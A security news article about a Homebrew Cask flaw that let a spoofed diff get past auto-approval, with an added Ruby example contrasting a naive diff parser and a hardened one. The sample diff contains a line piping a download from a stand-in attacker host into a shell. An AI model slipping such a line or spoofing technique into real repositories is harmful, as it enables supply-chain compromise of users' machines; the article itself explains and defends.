Critical RCE Bug Found in Homebrew Package Manager for macOS and Linux


A recently identified security vulnerability in the official Homebrew Cask repository could have been exploited by an attacker to execute arbitrary code on users' machines that have Homebrew installed.

The issue, which was reported to the maintainers on April 18 by a Japanese security researcher named RyotaK, stemmed from the way code changes in its GitHub repository were handled, resulting in a scenario where a malicious pull request (i.e., the proposed changes) could be automatically reviewed and approved. The flaw was fixed on April 19.


Homebrew is a free and open-source software package manager that allows the installation of software on Apple's macOS operating system as well as Linux. Homebrew Cask extends that functionality to include command-line workflows for GUI-based macOS applications, fonts, plugins, and other non-open-source software.

"The discovered vulnerability would allow an attacker to inject arbitrary code into a cask and have it be merged automatically," Homebrew's Markus Reiter said. "This is due to a flaw in the git_diff dependency of the review-cask-pr GitHub Action, which is used to parse a pull request's diff for inspection. Due to this flaw, the parser can be spoofed into completely ignoring the offending lines, resulting in successfully approving a malicious pull request."

In other words, the flaw meant malicious code injected into the Cask repository could be merged without any human review and approval: the automation only saw the lines the parser kept, and the check it ran on those lines passed.
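To make the class of bug concrete, here is an added illustration in Ruby (Homebrew's own language). It is not code from Homebrew, from the review-cask-pr action or from the git_diff gem, and it does not reproduce RyotaK's proof of concept. It pairs a naive unified-diff parser that misclassifies any `+++ `/`--- ` line as a file header with a parser that only recognises headers outside hunks, and runs the same "version bump only" auto-approval rule on both. The sample diff, the cask name, the attacker URL and the specific spoof (an added line whose content starts with `++ `, so it appears as `+++ ` in the diff) are all constructed for this example and are an assumed instance of the parser-confusion class, not a claim about the exact defect in git_diff.

```ruby
# Added illustration, not code from Homebrew, review-cask-pr or the git_diff gem:
# a "version bump only" auto-approval check built on a naive diff parser that
# can be spoofed, beside the same check on a parser that honours hunk headers.

# Constructed sample diff. The third added line begins with "++ " in the cask
# file, so it shows up as "+++ " in the unified diff. (Assumed spoof for this
# illustration, not a claim about the exact git_diff defect.)
CASK_DIFF = <<~'DIFF'
  diff --git a/Casks/example.rb b/Casks/example.rb
  --- a/Casks/example.rb
  +++ b/Casks/example.rb
  @@ -1,6 +1,7 @@
   cask "example" do
  -  version "1.0.0"
  -  sha256 "aaaa"
  +  version "1.0.1"
  +  sha256 "bbbb"
  +++ system "curl -fsSL https://attacker.invalid/x | sh"
     url "https://example.com/example-#{version}.dmg"
     name "Example"
   end
DIFF

# Naive parser: classifies lines by prefix only, so any "+++ "/"--- " line is
# mistaken for a file header and silently dropped, even inside a hunk.
def naive_changed_lines(diff)
  changes = []
  diff.each_line(chomp: true) do |line|
    next if line.start_with?("diff --git", "index ", "@@")
    next if line.start_with?("+++ ", "--- ") # BUG: header check ignores position
    case line[0]
    when "+" then changes << [:add, line[1..-1]]
    when "-" then changes << [:del, line[1..-1]]
    end
  end
  changes
end

# Hardened parser: file headers are only recognised outside hunks; inside a
# hunk, every line is consumed according to the "@@ -a,b +c,d @@" counts that
# git itself wrote, so a "+++ ..." body line is just another added line.
def strict_changed_lines(diff)
  changes = []
  lines = diff.each_line(chomp: true).to_a
  i = 0
  while i < lines.size
    m = lines[i].match(/\A@@ -\d+(?:,(\d+))? \+\d+(?:,(\d+))? @@/)
    if m.nil?
      i += 1 # "diff --git", "index", "---", "+++": only valid between hunks
      next
    end
    old_left = (m[1] || "1").to_i
    new_left = (m[2] || "1").to_i
    i += 1
    while old_left > 0 || new_left > 0
      body = lines[i]
      raise "truncated hunk" if body.nil?
      case body[0]
      when " "  then old_left -= 1; new_left -= 1
      when "-"  then old_left -= 1; changes << [:del, body[1..-1]]
      when "+"  then new_left -= 1; changes << [:add, body[1..-1]]
      when "\\" then nil # "\ No newline at end of file" marker, not counted
      else raise "malformed hunk line: #{body.inspect}"
      end
      i += 1
    end
  end
  changes
end

# The auto-approval rule: every changed line must be a version or sha256 bump.
BUMP_ONLY = /\A\s*(?:version|sha256)\s+"[^"]*"\s*\z/

def bump_only?(changes)
  !changes.empty? && changes.all? { |_kind, content| content.match?(BUMP_ONLY) }
end

if __FILE__ == $PROGRAM_NAME
  puts "naive  auto-approve? #{bump_only?(naive_changed_lines(CASK_DIFF))}"
  puts "strict auto-approve? #{bump_only?(strict_changed_lines(CASK_DIFF))}"
end
```

Run as a script, the naive parser reports four changed lines, all of them version or sha256 bumps, and would auto-approve; the strict parser reports five, including the `++ system ...` line, and refuses. The strict parser can trust the hunk counts because the diff is produced by git on the platform side, not by the pull request author. Even so, any auto-merge that depends on parsing a diff correctly remains brittle, which is why the remediation described below was to remove the automation rather than just patch the parser.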


The researcher also submitted a proof-of-concept (PoC) pull request demonstrating the vulnerability, which was reverted afterwards. In light of the findings, Homebrew has removed the "automerge" GitHub Action and has disabled and removed the "review-cask-pr" GitHub Action from all vulnerable repositories.

In addition, the ability for bots to commit to homebrew/cask* repositories has been removed, and all pull requests now require manual review and approval by a maintainer. No user action is required.

"If this vulnerability was abused by a malicious actor, it could be used to compromise the machines that run brew before it gets reverted," the researcher said. "So I strongly feel that a security audit against the centralized ecosystem is required."
